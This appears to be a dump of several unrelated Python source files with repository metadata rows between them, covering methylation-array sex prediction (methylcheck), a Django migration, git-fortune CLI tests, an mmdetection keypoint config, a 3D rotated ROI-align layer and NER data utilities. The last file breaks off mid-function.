path -- to a folder also containing samplesheet pkl and poobah_values.pkl, if you want to compare predicted sex with actual sex.
data_containers -- object created from methylprep.run_pipeline() or methylcheck.load(path, 'meth')
tuple of (meth, unmeth) dataframes
array_type (string)
enum: {'27k','450k','epic','epic+','mouse'}
if not specified, it will load the data from data_source and determine the array for you.
median_cutoff
the minimum difference in the medians of X and Y probe copy numbers to assign male or female
(copied from the minfi sex predict function)
include_probe_failure_percent:
True: includes poobah percent per sample as column in the output table and on the plot.
Note: you must supply a 'path' as data_source to include poobah in plots.
poobah_cutoff
The maximum percent of sample probes that can fail before the sample fails. Default is 20 (percent)
Has no effect if `include_probe_failure_percent` is False.
plot
True: creates a plot, with option to `save` as image or `return_fig`.
save
True: saves the plot, if plot is True
return_fig
If True, returns a pyplot figure instead of a dataframe. Default is False.
Note: return_fig will not show a plot on screen.
return_labels: (requires plot == True)
When using poobah_cutoff, the figure only includes A-Z,1...N labels on samples on plot to make it easier to read.
So to get what sample_ids these labels correspond to, you can rerun the function with return_labels=True and it will
skip plotting and just return a dictionary with sample_ids and these labels, to embed in a PDF report if you like.
custom_label:
Option to provide a dictionary with keys as sample_ids and values as labels to apply to samples.
e.g. add more data about samples to the multi-dimensional QC plot
while providing a filepath is the easiest way, you can also pass in a data_containers object,
a list of data_containers containing raw meth/unmeth values, instead. This object is produced
by methylprep.run_pipeline, or by using methylcheck.load(filepath, format='meth') and lets you
    customize the import if your files were not prepared using methylprep (non-standard CSV columns, for example)
If a `poobah_values.pkl` file can be found in path, the dataframe returned will also include
percent of probes for X and Y chromosomes that failed quality control, and warn the user if any did.
This feature won't work if a containers object or tuple of dataframes is passed in, instead of a path.
Note: ~90% of Y probes should fail if the sample is female. That chromosome is missing."""
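    # Worked example with hypothetical medians: x_median=13.2 and y_median=9.8 give a
    # difference of -3.4, below the default median_cutoff of -2, so the sample is
    # called 'F'; with a Y chromosome present the two medians are usually similar,
    # the difference stays above -2, and the sample is called 'M'.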
allowed_array_types = {'27k','450k','epic','epic+','mouse'}
try:
from methylprep.files import Manifest
from methylprep.models import ArrayType
except ImportError:
raise ImportError("This function requires methylprep to be installed (pip3 install `methylprep`)")
(data_source_type, data_source) = methylcheck.load_processed._data_source_type(data_source)
# data_source_type is one of {'path', 'container', 'control', 'meth_unmeth_tuple'}
poobah=None
if data_source_type in ('path'):
# this will look for saved pickles first, then csvs or parsing the containers (which are both slower)
# the saved pickles function isn't working for batches yet.
try:
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=None, path=data_source,
compare=False, noob=False, verbose=False)
except Exception as e:
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=None, path=data_source,
compare=False, noob=True, verbose=False)
if include_probe_failure_percent == True and Path(data_source,'poobah_values.pkl').expanduser().exists():
poobah = pd.read_pickle(Path(data_source,'poobah_values.pkl').expanduser())
elif data_source_type in ('container'):
# this will look for saved pickles first, then csvs or parsing the containers (which are both slower)
# the saved pickles function isn't working for batches yet.
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=data_source, path=None,
compare=False, noob=False, verbose=False)
elif data_source_type == 'meth_unmeth_tuple':
(meth, unmeth) = data_source
if len(meth) != len(unmeth):
raise ValueError(f"WARNING: probe count mismatch: meth {len(meth)} -- unmeth {len(unmeth)}")
if array_type == None:
# get list of X any Y probes - using .methylprep_manifest_files (or MANIFEST_DIR_PATH_LAMBDA) and auto-detected array here
array_type = ArrayType(methylcheck.detect_array(meth, on_lambda=on_lambda))
elif isinstance(array_type,str):
if array_type in allowed_array_types:
array_type = ArrayType(array_type)
else:
raise ValueError(f"Your array_type must be one of these: {allowed_array_types} or None.")
if verbose:
LOGGER.debug(array_type)
LOGGER.setLevel(logging.WARNING)
manifest = Manifest(array_type, on_lambda=on_lambda, verbose=verbose)._Manifest__data_frame # 'custom', '27k', '450k', 'epic', 'epic+'
LOGGER.setLevel(logging.INFO)
x_probes = manifest.index[manifest['CHR']=='X']
y_probes = manifest.index[manifest['CHR']=='Y']
if verbose:
LOGGER.info(f"Found {len(x_probes)} X and {len(y_probes)} Y probes")
# dataframes of meth and unmeth values for the sex chromosomes
x_meth = meth[meth.index.isin(x_probes)]
x_unmeth = unmeth[unmeth.index.isin(x_probes)]
y_meth = meth[meth.index.isin(y_probes)]
y_unmeth = unmeth[unmeth.index.isin(y_probes)]
# create empty dataframe for output
output = pd.DataFrame(index=[s for s in meth.columns], columns=['x_median','y_median','predicted_sex'])
# get median values for each sex chromosome for each sample
x_med = _get_copy_number(x_meth,x_unmeth).median()
y_med = _get_copy_number(y_meth,y_unmeth).median()
# populate output dataframe with values
output['x_median'] = output.index.map(x_med)
output['y_median'] = output.index.map(y_med)
# compute difference
median_difference = output['y_median'] - output['x_median']
# median cutoff - can be manipulated by user --- default = -2 --- used to predict sex
sex0 = ['F' if x < median_cutoff else 'M' for x in median_difference]
# NOTE for testing: GSE85566/GPL13534 (N=120) has 4 samples that are predicted as wrong sex when using -2, but work at -0.5.
# populate dataframe with predicted sex
output['predicted_sex'] = sex0
output = output.round(1)
# if poobah_df exists, calculate percent X and Y probes that failed
sample_failure_percent = {} # % of ALL probes in sample, not just X or Y
if include_probe_failure_percent == True and isinstance(poobah, pd.DataFrame):
p_value_cutoff = 0.05
X_col = []
Y_col = []
failed_samples = []
for column in poobah.columns:
sample_failure_percent[column] = round(100*len(poobah[column][poobah[column] >= p_value_cutoff].index) / len(poobah.index),1)
failed_probe_names = poobah[column][poobah[column] >= p_value_cutoff].index
failed_x_probe_names = list(set(failed_probe_names) & set(x_probes))
failed_y_probe_names = list(set(failed_probe_names) & set(y_probes))
X_percent = round(100*len(failed_x_probe_names)/poobah.index.isin(list(x_probes)).sum(),1)
Y_percent = round(100*len(failed_y_probe_names)/poobah.index.isin(list(y_probes)).sum(),1)
X_col.append(X_percent)
Y_col.append(Y_percent)
if X_percent > 10:
failed_samples.append(column)
output['X_fail_percent'] = X_col #output.index.map(X_col)
output['Y_fail_percent'] = Y_col #output.index.map(Y_col)
if failed_samples != []:
LOGGER.warning(f"{len(failed_samples)} samples had >10% of X probes fail p-value probe detection. Predictions for these may be unreliable:")
LOGGER.warning(f"{failed_samples}")
if data_source_type in ('path'):
output = _fetch_actual_sex_from_sample_sheet_meta_data(data_source, output)
if plot == True:
fig = _plot_predicted_sex(data=output, # 'x_median', 'y_median', 'predicted_sex', 'X_fail_percent', 'Y_fail_percent'
sample_failure_percent=sample_failure_percent,
median_cutoff=median_cutoff,
include_probe_failure_percent=include_probe_failure_percent,
verbose=verbose,
save=save,
poobah_cutoff=poobah_cutoff,
custom_label=custom_label,
data_source_type=data_source_type,
data_source=data_source,
return_fig=return_fig,
return_labels=return_labels,
)
if return_labels:
return fig # these are a lookup dictionary of labels
if return_fig:
return fig
return output
def _plot_predicted_sex(data=pd.DataFrame(),
sample_failure_percent={},
median_cutoff= -2,
include_probe_failure_percent=True,
verbose=False,
save=False,
poobah_cutoff=20, #%
custom_label=None,
data_source_type=None,
data_source=None,
return_fig=False,
return_labels=False):
"""
data columns: ['x_median', 'y_median', 'predicted_sex', 'X_fail_percent', 'Y_fail_percent']
- color is sex, pink or blue
- marker circle size will be larger and more faded if poobah values are worse, smaller and darker if low variance. Like a probability cloud.
- sample text is (ID, delta age)
- sex mismatches are X, matched samples are circles (if samplesheet contains actual sex data)
- omits labels for samples that have LOW failure rates, but shows IDs when failed
- adds legend of sketchy samples and labels
- show delta age on labels (using custom column dict)
- unit tests with custom label and without, and check that controls_report still works with this function
- save_fig
- return_labels, returns a lookup dict instead of plot
if there is a "custom_label" dict passed in, such as (actual_age - predicted_age), it simply adds those this label to the marker text labels.
Dicts must match the data DF index.
"""
if sample_failure_percent != {} and set(sample_failure_percent.keys()) == set(data.index):
data['sample_failure_percent'] = pd.Series(sample_failure_percent)
else:
LOGGER.warning("sample_failure_percent index did not align with output data index")
#sns.set_theme(style="white")
show_mismatches = None if 'sex_matches' not in data.columns else "sex_matches"
if show_mismatches:
data["sex_matches"] = data["sex_matches"].map({0:"Mismatch", 1:"Match"})
show_failure = None if 'sample_failure_percent' not in data.columns else "sample_failure_percent"
sample_sizes = (20, 600)
if show_failure: # avoid sizing dots with narrow range; gives false impression of bad samples.
poobah_range = data["sample_failure_percent"].max() - data["sample_failure_percent"].min()
if poobah_range < poobah_cutoff/2:
show_failure = None
sample_sizes = (40,40)
custom_palette = sns.set_palette(sns.color_palette(['#FE6E89','#0671B7']))
# if only one sex, make sure male is blue; female is pink
# if hasattr(output, 'actual_sex') and set(output.actual_sex) == set('M')
# if first value to be plotted is male, change palette
if hasattr(data, 'predicted_sex') and list(data.predicted_sex)[0] == 'M':
custom_palette = sns.set_palette(sns.color_palette(['#0671B7','#FE6E89']))
fig = sns.relplot(data=data,
x='x_median',
y='y_median',
hue="predicted_sex",
size=show_failure,
style=show_mismatches,
sizes=sample_sizes,
alpha=.5,
palette=custom_palette,
height=8,
aspect=1.34)
ax = fig.axes[0,0]
fig.fig.subplots_adjust(top=.95)
# for zoomed-in plots with few points close together, set the min scale to be at least 2 units.
yscale = plt.gca().get_ylim()
xscale = plt.gca().get_xlim()
if abs(yscale[1]-yscale[0]) < 2.0:
ax.set_xlim(xmin=xscale[0]-1, xmax=xscale[1]+1)
ax.set_ylim(ymin=yscale[0]-1, ymax=yscale[1]+1)
label_lookup = {index_val: chr(i+65) if (i <= 26) else str(i-26) for i,index_val in enumerate(data.index)}
for idx,row in data.iterrows():
if "sample_failure_percent" in row and row['sample_failure_percent'] > poobah_cutoff:
label = f"{label_lookup[idx]}, {custom_label.get(idx)}" if isinstance(custom_label, dict) and custom_label.get(idx) else label_lookup[idx]
ax.text(row['x_median'], row['y_median'], label, horizontalalignment='center', fontsize=10, color='darkred')
else:
label = f"{custom_label.get(idx)}" if isinstance(custom_label, dict) else None
if label:
ax.text(row['x_median']+0.05, row['y_median']+0.05, label, horizontalalignment='center', fontsize=10, color='grey')
if return_labels:
plt.close() # release memory
return label_lookup
if "sample_failure_percent" in data.columns:
N_failed = len(data[data['sample_failure_percent'] > poobah_cutoff].index)
N_total = len(data['sample_failure_percent'].index)
ax.set_title(f"{N_failed} of {N_total} samples failed poobah, with at least {poobah_cutoff}% of probes failing")
else:
ax.set_title(f"Predicted sex based on matching X and Y probes.")
if save:
filepath = 'predicted_sexes.png' if data_source_type != 'path' else Path(data_source,'predicted_sexes.png').expanduser()
plt.savefig(filepath, bbox_inches="tight")
if return_fig:
return fig
plt.show()
def _fetch_actual_sex_from_sample_sheet_meta_data(filepath, output):
"""output is a dataframe with Sample_ID in the index. This adds actual_sex as a column and returns it."""
# controls_report() does the same thing, and only calls get_sex() with the minimum of data to be fast, because these are already loaded. Just passes in meth/unmeth data
# Sample sheet should have 'M' or 'F' in column to match predicted sex.
# merge actual sex into processed output, if available
file_patterns = {
'sample_sheet_meta_data.pkl': 'meta',
'*_meta_data.pkl': 'meta',
'*samplesheet*.csv': 'meta',
'*sample_sheet*.csv': 'meta',
}
loaded_files = {}
for file_pattern in file_patterns:
for filename in Path(filepath).expanduser().rglob(file_pattern):
if '.pkl' in filename.suffixes:
loaded_files['meta'] = pd.read_pickle(filename)
break
if '.csv' in filename.suffixes:
loaded_files['meta'] = pd.read_csv(filename)
break
if len(loaded_files) == 1:
# methylprep v1.5.4-6 was creating meta_data files with two Sample_ID columns. Check and fix here:
# methylcheck 0.7.9 / prep 1.6.0 meta_data lacking Sample_ID when sample_sheet uses alt column names and gets replaced.
if any(loaded_files['meta'].columns.duplicated()):
loaded_files['meta'] = loaded_files['meta'].loc[:, ~loaded_files['meta'].columns.duplicated()]
LOGGER.info("Removed a duplicate Sample_ID column in samplesheet")
if 'Sample_ID' in loaded_files['meta'].columns:
loaded_files['meta'] = loaded_files['meta'].set_index('Sample_ID')
elif 'Sentrix_ID' in loaded_files['meta'].columns and 'Sentrix_Position' in loaded_files['meta'].columns:
loaded_files['meta']['Sample_ID'] = loaded_files['meta']['Sentrix_ID'].astype(str) + '_' + loaded_files['meta']['Sentrix_Position'].astype(str)
loaded_files['meta'] = loaded_files['meta'].set_index('Sample_ID')
else:
raise ValueError("Your sample sheet must have a Sample_ID column, or (Sentrix_ID and Sentrix_Position) columns.")
# fixing case of the relevant column
renamed_column = None
if ('Gender' in loaded_files['meta'].columns or 'Sex' in loaded_files['meta'].columns):
if 'Gender' in loaded_files['meta'].columns:
renamed_column = 'Gender'
elif 'Sex' in loaded_files['meta'].columns:
renamed_column = 'Sex'
else:
renamed_columns = {col:(col.title() if col.lower() in ('sex','gender') else col) for col in loaded_files['meta'].columns}
loaded_files['meta'] = loaded_files['meta'].rename(columns=renamed_columns)
if 'Gender' in renamed_columns.values():
renamed_column = 'Gender'
elif 'Sex' in renamed_columns.values():
renamed_column = 'Sex'
if renamed_column is not None:
# next, ensure samplesheet Sex/Gender (Male/Female) are recoded as M/F; controls_report() does NOT do this step, but should.
sex_values = set(loaded_files['meta'][renamed_column].unique())
#print('sex_values', sex_values)
if not sex_values.issubset(set(['M','F'])): # subset, because samples might only contain one sex
if 'Male' in sex_values or 'Female' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'Male':'M', 'Female':'F'})
elif 'male' in sex_values or 'female' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'male':'M', 'female':'F'})
elif 'MALE' in sex_values or 'FEMALE' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'MALE':'M', 'FEMALE':'F'})
elif 'm' in sex_values or 'f' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'m':'M', 'f':'F'})
else:
raise ValueError(f"Cannot compare with predicted sex because actual sexes listed in your samplesheet are not understood (expecting M or F): (found {sex_values})")
output['actual_sex'] = None
output['sex_matches'] = None
for row in output.itertuples():
try:
actual_sex = str(loaded_files['meta'].loc[row.Index].get(renamed_column))
except KeyError:
if 'Sample_ID' in output.columns:
LOGGER.warning("Sample_ID was another column in your output DataFrame; Set that to the index when you pass it in.")
raise KeyError("Could not read actual sex from meta data to compare.")
if isinstance(actual_sex, pd.Series):
LOGGER.warning(f"Multiple samples matched actual sex for {row.Index}, because Sample_ID repeats in sample sheets. Only using first match, so matches may not be accurate.")
actual_sex = actual_sex[0]
if hasattr(row,'predicted_sex'):
sex_matches = 1 if actual_sex.upper() == str(row.predicted_sex).upper() else 0
else:
sex_matches = np.nan
output.loc[row.Index, 'actual_sex'] = actual_sex
output.loc[row.Index, 'sex_matches'] = sex_matches
else:
pass # no Sex/Gender column found in samplesheet
return output
| 53.583979 | 191 | 0.672711 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9,610 | 0.463423 |
6a15c95427effad3d19c61b8dfdb12b52e2999fa | 649 | py | Python | backend/accounts/migrations/0003_auto_20201115_1537.py | mahmoud-batman/quizz-app | bebeff8d055ea769773cd1c749f42408aa83f5b9 | [
"MIT"
] | null | null | null | backend/accounts/migrations/0003_auto_20201115_1537.py | mahmoud-batman/quizz-app | bebeff8d055ea769773cd1c749f42408aa83f5b9 | [
"MIT"
] | null | null | null | backend/accounts/migrations/0003_auto_20201115_1537.py | mahmoud-batman/quizz-app | bebeff8d055ea769773cd1c749f42408aa83f5b9 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-11-15 15:37
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0002_auto_20201115_1531'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='user_id',
field=models.IntegerField(blank=True, null=True, unique=True, validators=[django.core.validators.MaxValueValidator(99999), django.core.validators.MinValueValidator(10000), django.core.validators.MinLengthValidator(5), django.core.validators.MaxLengthValidator(5)]),
),
]
| 32.45 | 277 | 0.697997 | 526 | 0.810478 | 0 | 0 | 0 | 0 | 0 | 0 | 103 | 0.158706 |
6a164cca97745158870c1da7ad0a330912380e28 | 2,504 | py | Python | tests/test_basics.py | sirosen/git-fortune | 69ef3e18506aa67fdc812854f1588828ea4e7448 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/test_basics.py | sirosen/git-fortune | 69ef3e18506aa67fdc812854f1588828ea4e7448 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/test_basics.py | sirosen/git-fortune | 69ef3e18506aa67fdc812854f1588828ea4e7448 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import subprocess
from git_fortune._compat import fix_line_endings
from git_fortune.version import __version__
def test_help(capfd):
subprocess.check_call(["git-fortune", "-h"])
captured = capfd.readouterr()
assert (
fix_line_endings(
"""
A fortune-like command for showing git tips
Invoke it as 'git-fortune' or 'git fortune'
"""
)
in captured.out
)
def test_version(capfd):
subprocess.check_call(["git-fortune", "--version"])
captured = capfd.readouterr()
assert "git-fortune {}".format(__version__) in captured.out
def test_tip_boxformat(capfd):
subprocess.check_call(["git-fortune", "--id", "3"])
tip3boxbody = fix_line_endings(
"""\
+-------------------------------------------------------------------------------+
| GIT TIP #3 |
| |
| `git log --graph` can show you a tree-like representation of the git history. |
| |
| Try adding in `--oneline --decorate --all`. |
| |
+-------------------------------------------------------------------------------+
"""
)
captured = capfd.readouterr()
assert captured.out == tip3boxbody
def test_tip_plainformat(capfd):
subprocess.check_call(["git-fortune", "--format", "plain", "--id", "1"])
tip1plainbody = fix_line_endings(
"Modify your last commit before pushing with `git commit --amend`.\n"
)
captured = capfd.readouterr()
assert captured.out == tip1plainbody
def test_noargs(capfd):
"""just make sure it doesn't crashfail"""
subprocess.check_call(["git-fortune"])
captured = capfd.readouterr()
assert "GIT TIP #" in captured.out # from the box format
def test_category(capfd):
"""just make sure it doesn't crashfail"""
subprocess.check_call(["git-fortune", "--category", "diff"])
captured = capfd.readouterr()
assert "GIT TIP #" in captured.out # from the box format
def test_category_and_id_mutex(capfd):
ret = subprocess.call(["git-fortune", "--category", "diff", "--id", "3"])
assert ret == 2
captured = capfd.readouterr()
assert "" == captured.out
assert "argument --id: not allowed with argument --category" in captured.err
| 33.386667 | 81 | 0.527157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,232 | 0.492013 |
6a167dd5d92960139223aa44954c2cb6cacf4375 | 2,487 | py | Python | configs/keypoints/faster_rcnn_r50_fpn_keypoints.py | VGrondin/CBNetV2_mask_remote | b27246af5081d5395db3c3105d32226de05fcd13 | [
"Apache-2.0"
] | null | null | null | configs/keypoints/faster_rcnn_r50_fpn_keypoints.py | VGrondin/CBNetV2_mask_remote | b27246af5081d5395db3c3105d32226de05fcd13 | [
"Apache-2.0"
] | null | null | null | configs/keypoints/faster_rcnn_r50_fpn_keypoints.py | VGrondin/CBNetV2_mask_remote | b27246af5081d5395db3c3105d32226de05fcd13 | [
"Apache-2.0"
] | null | null | null | _base_ = [
'../_base_/models/faster_rcnn_r50_fpn.py'
]
model = dict(
type='FasterRCNN',
# pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
scales=[8],
ratios=[0.5, 1.0, 2.0],
strides=[4, 8, 16, 32, 64]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)),
roi_head=dict(
# type='StandardRoIHead',
_delete_=True,
type='KeypointRoIHead',
output_heatmaps=False,
# keypoint_head=dict(
# type='HRNetKeypointHead',
# num_convs=8,
# in_channels=256,
# features_size=[256, 256, 256, 256],
# conv_out_channels=512,
# num_keypoints=5,
# loss_keypoint=dict(type='MSELoss', loss_weight=50.0)),
keypoint_decoder=dict(type='HeatmapDecodeOneKeypoint', upscale=4),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='Shared2FCBBoxHead',
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)))
)
#optimizer = dict(lr=0.002)
#lr_config = dict(step=[40, 55])
#total_epochs = 60
| 32.298701 | 77 | 0.542421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 672 | 0.270205 |
6a168cae49b57ce434a41c7070da071ca4734fc0 | 3,232 | py | Python | maskrcnn_benchmark/layers/roi_align_rotated_3d.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | 2 | 2020-03-05T06:39:03.000Z | 2020-03-31T12:08:04.000Z | maskrcnn_benchmark/layers/roi_align_rotated_3d.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | null | null | null | maskrcnn_benchmark/layers/roi_align_rotated_3d.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | 1 | 2021-09-24T13:17:40.000Z | 2021-09-24T13:17:40.000Z | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import torch, math
from torch import nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from SparseConvNet.sparseconvnet.tools_3d_2d import sparse_3d_to_dense_2d
import _C
class _ROIAlignRotated3D(Function):
@staticmethod
def forward(ctx, input, roi, output_size, spatial_scale, sampling_ratio):
ctx.save_for_backward(roi)
ctx.output_size = _pair(output_size)
ctx.spatial_scale = spatial_scale
ctx.sampling_ratio = sampling_ratio
ctx.input_shape = input.size()
# input: [4, 256, 304, 200, 7]
# roi: [171, 8]
# spatial_scale: 0.25
# output_size: [7,7,7]
# sampling_ratio: 2
output = _C.roi_align_rotated_3d_forward(
input, roi, spatial_scale, output_size[0], output_size[1], output_size[2], sampling_ratio
) # [171, 256, 7, 7]
return output
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
rois, = ctx.saved_tensors
output_size = ctx.output_size
spatial_scale = ctx.spatial_scale
sampling_ratio = ctx.sampling_ratio
bs, ch, h, w, zsize = ctx.input_shape
grad_input = _C.roi_align_rotated_3d_backward(
grad_output,
rois,
spatial_scale,
output_size[0],
output_size[1],
output_size[2],
bs,
ch,
h,
w,
zsize,
sampling_ratio,
)
return grad_input, None, None, None, None
roi_align_rotated_3d = _ROIAlignRotated3D.apply
class ROIAlignRotated3D(nn.Module):
def __init__(self, output_size, spatial_scale, sampling_ratio):
'''
output_size:[pooled_height, pooled_width]
spatial_scale: size_of_map/size_of_original_image
sampling_ratio: how many points to use for bilinear_interpolate
'''
super(ROIAlignRotated3D, self).__init__()
self.output_size = output_size # (7,7,7)
self.spatial_scale = spatial_scale # 0.25
self.sampling_ratio = sampling_ratio # 2
def forward(self, input_s3d, rois_3d):
'''
input0: sparse 3d tensor
rois_3d: 3d box, xyz order is same as input0,
yaw unit is rad, anti-clock wise is positive
input: [batch_size, feature, h, w]
rois: [n,5] [batch_ind, center_w, center_h, roi_width, roi_height, theta]
theta unit: degree, anti-clock wise is positive
Note: the order of w and h inside of input and rois is different.
'''
input_d3d = sparse_3d_to_dense_2d(input_s3d)
output = roi_align_rotated_3d(
input_d3d, rois_3d, self.output_size, self.spatial_scale, self.sampling_ratio
)
return output
def __repr__(self):
tmpstr = self.__class__.__name__ + "("
tmpstr += "output_size=" + str(self.output_size)
tmpstr += ", spatial_scale=" + str(self.spatial_scale)
tmpstr += ", sampling_ratio=" + str(self.sampling_ratio)
tmpstr += ")"
return tmpstr
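# Illustrative usage sketch (added; not part of the original file). Assuming `feats_s3d`
# is a SparseConvNet sparse 3D feature tensor and `rois_3d` is an (N, 8) tensor of rotated
# boxes (the forward() notes above show an 8-column roi, but the exact column layout is an
# assumption), pooling to a 7x7x7 grid might look like:
#   pooler = ROIAlignRotated3D(output_size=(7, 7, 7), spatial_scale=0.25, sampling_ratio=2)
#   pooled = pooler(feats_s3d, rois_3d)  # per-roi features computed by the _C CUDA kernel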
| 34.021053 | 101 | 0.63552 | 2,846 | 0.880569 | 0 | 0 | 1,307 | 0.404394 | 0 | 0 | 886 | 0.274134 |
6a16ef74b6b87e7acddaab1f4ea03a7e48da5422 | 8,360 | py | Python | src/model/utils/utils.py | J-CITY/METADATA-EXTRACTOR | 6bc01a7e4b74a3156c07efc2c80d5519c325dd53 | [
"Apache-2.0"
] | null | null | null | src/model/utils/utils.py | J-CITY/METADATA-EXTRACTOR | 6bc01a7e4b74a3156c07efc2c80d5519c325dd53 | [
"Apache-2.0"
] | null | null | null | src/model/utils/utils.py | J-CITY/METADATA-EXTRACTOR | 6bc01a7e4b74a3156c07efc2c80d5519c325dd53 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
from .logger import printLog
UNK = "$UNK$"
NUM = "$NUM$"
NONE = "O"
class ParrotIOError(Exception):
def __init__(self, filename):
message = "ERROR: Can not find file {}.".format(filename)
super(ParrotIOError, self).__init__(message)
# Class that iterates over CoNLL Dataset
class CoNLLDataset(object):
def __init__(self, filename, processingWord=None, processingTag=None,
maxIter=None):
self.filename = filename
self.processingWord = processingWord # function that takes a word as input
self.processingTag = processingTag # function that takes a tag as input
self.maxIter = maxIter # max number of sentences to yield
self.length = None
def __iter__(self):
niter = 0
with open(self.filename, encoding='utf-8') as f:
words, tags = [], []
for line in f:
line = line.strip() # delete spaces in start and end
if (len(line) == 0 or line.startswith("-DOCSTART-")):
if len(words) != 0:
niter += 1
if self.maxIter is not None and niter > self.maxIter:
break
yield words, tags
words, tags = [], []
else:
ls = line.split(' ')
word, tag = ls[0],ls[-1]
if self.processingWord is not None:
word = self.processingWord(word)
if self.processingTag is not None:
tag = self.processingTag(tag)
words += [word]
tags += [tag]
def __len__(self):
if self.length is None:
self.length = 0
for _ in self:
self.length += 1
return self.length
#Create a dictionary from dataset
def getDictionary(datasets):
printLog("Building dictionary: ")
dictWords = set()
dictTags = set()
for dataset in datasets:
for words, tags in dataset:
dictWords.update(words)
dictTags.update(tags)
printLog("DONE: " + str(len(dictWords)) + " size")
return dictWords, dictTags
def getCharDictionary(dataset):
dictChar = set()
for words, _ in dataset:
for word in words:
dictChar.update(word)
return dictChar
#filename - path wo file with vectors
def getGloveDictionary(filename):
printLog("Building dictionary")
dictGlove = set()
with open(filename, encoding='utf-8') as f:
for line in f:
word = line.strip().split(' ')[0]
dictGlove.add(word)
printLog("DONE: "+ str(len(dictGlove)) +" tokens")
return dictGlove
def saveDictionary(dictionary, filename):
printLog("SAVE")
with open(filename, "w", encoding='utf-8') as f:
for i, word in enumerate(dictionary):
if i != len(dictionary) - 1:
f.write("{}\n".format(word))
else:
f.write(word)
def loadDictionary(filename):
try:
d = dict()
with open(filename, encoding='utf-8') as f:
for idx, word in enumerate(f):
word = word.strip()
d[word] = idx
except IOError:
raise ParrotIOError(filename)
return d
def exportCompactGloveVectors(dictionary, gloveFilename, trimmedFilename, dim):
embeddings = np.zeros([len(dictionary), dim])
with open(gloveFilename, encoding='utf-8') as f:
for line in f:
line = line.strip().split(' ')
word = line[0]
if word in dictionary:
embedding = [float(x) for x in line[1:]] #glove coords
wordID = dictionary[word]
embeddings[wordID] = np.asarray(embedding)
np.savez_compressed(trimmedFilename, embeddings=embeddings) # store glove matrix
def getCompactGloveVectors(filename):
try:
with np.load(filename) as data:
return data["embeddings"]
except IOError:
raise ParrotIOError(filename)
def getProcessingWord(dictWords=None, dictChars=None,
lowercase=False, chars=False, allowUNK=True):
def f(word):
# char ids for word
if (dictChars is not None) and (chars == True):
charIDs = []
for char in word:
if (char in dictChars):
charIDs.append(dictChars[char])
if lowercase:
word = word.lower()
if word.isdigit():
word = NUM
# word id
if (dictWords is not None):
if word in dictWords:
word = dictWords[word]
elif allowUNK:
word = dictWords[UNK]
else:
raise Exception("Unknow tag.")
if (dictChars is not None) and (chars == True):
# chars ids and word id
return charIDs, word
# word id
return word
return f
def _padSequences(sequences, padtok, maxLength):
sequencePadded, sequenceLength = [], []
for seq in sequences:
seq = list(seq)
seq_ = seq[:maxLength] + [padtok]*max(maxLength - len(seq), 0)
sequencePadded += [seq_]
sequenceLength += [min(len(seq), maxLength)]
# all sublist have same length
return sequencePadded, sequenceLength
def padSequences(sequences, padtok, nlevels=1):
if nlevels == 1:
maxLength = max(map(lambda x : len(x), sequences))
sequencePadded, sequenceLength = _padSequences(sequences,
padtok, maxLength)
elif nlevels == 2:
maxLengthWord = max([max(map(lambda x: len(x), seq))
for seq in sequences])
sequencePadded, sequenceLength = [], []
for seq in sequences:
# all words are same length
sp, sl = _padSequences(seq, padtok, maxLengthWord)
sequencePadded += [sp]
sequenceLength += [sl]
maxLengthSentence = max(map(lambda x : len(x), sequences))
sequencePadded, _ = _padSequences(sequencePadded,
[padtok]*maxLengthWord, maxLengthSentence)
sequenceLength, _ = _padSequences(sequenceLength, 0,
maxLengthSentence)
return sequencePadded, sequenceLength
def minibatches(data, minibatchSize):
x_batch, y_batch = [], []
for (x, y) in data:
if len(x_batch) == minibatchSize:
yield x_batch, y_batch
